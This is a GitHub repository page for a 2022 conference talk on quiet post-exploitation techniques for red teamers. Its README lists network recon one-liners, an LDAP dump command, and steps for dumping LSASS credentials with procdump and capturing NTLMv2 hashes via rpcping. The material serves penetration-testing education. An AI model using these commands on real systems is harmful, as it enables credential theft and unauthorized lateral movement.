Skip to content
/ WWHF-StayingQuiet Public

Supplemental material from my talk at Wild West Hackin Fest in May 2022.

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

cwolff411/WWHF-StayingQuiet

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
README.md
README.md
 
 
WWHF - Move in Silence.pdf
WWHF - Move in Silence.pdf
 
 

Repository files navigation

fenrir-desktop-bg

Move in Silence: Staying Quiet in Mature Networks

This repo is supplemental material for my presentation for Wild West Hackin Fest's Way West conference in San Diego in 2022.

Abstract

Security Operations Centers and event monitoring have advanced by leaps and bounds in the past decade. While this is a good thing for cybersecurity as a whole, as red teamers and penetration testers, this means that Metasploit payloads and common tools simply won’t work. Any attempt to drop tools like Mimikatz or Responder will be contained by even the most basic of Antivirus and EDR. Want to kick off an Nmap scan and recon the network? Good luck with that!

This presentation focuses on ways to accomplish required tasks in a quiet manner. It will focus on performing network reconnaissance while emulating typical user behavior, performing the same tasks as common tools with alternative methods, obfuscating our code, and executing the same techniques as some of the worlds most advanced threat actors – all while staying quiet.

Things to Know

Everything in this discussion is based around post-exploitation scenarios, meaning that you have already landed on a machine, escalated privileges, and are looking to move throughout the network.

Recon Subnets

Use arp

arp -a

Ping broadcast address

ping -b x.x.x.255

Ping sweep on command line

Powershell:

1..254 | % {"192.168.1.$($_): $(Test-Connection -count 1 -comp 192.168.1.$($_) -quiet)"}

bash:

for i in \seq 1 255`; do ping -c 1 192.168.1.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done

Recon Active Directory

ldapsearch

Dump all of LDAP

ldapsearch -x -h x.x.x.x -b "DC=contoso,DC=com"

Screen Shot 2022-05-05 at 10 55 51 AM

Screen Shot 2022-05-05 at 10 56 31 AM

Parse machines from LDAP and perform nslookup

https://github.com/dirkjanm/ldapdomaindump

Screen Shot 2022-05-05 at 12 50 28 PM

Lateral Movement/Priv Esc

Dumping LSASS with procdump

Be fancy and use it from Sysinternals Live \\live.sysinternals.com\tools\procdump -ma lsass.exe OUTFILE.dmp

Or download procdump from https://docs.microsoft.com/en-us/sysinternals/ and do it same as above

Getting NTLMv2 hashes with rpcping

rpcping is a lolbin that will allow you to send an authenticated rpc ping to a remote host along with the current users NTLMv2 hash. Use it when you pop a shell, but don't know the compromised users password.

Check out the lolbas page on it

Creating SSL Tunnels

I've talk about this before in my presentation for Red Team Village. Check it out here

Resources

About

Supplemental material from my talk at Wild West Hackin Fest in May 2022.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published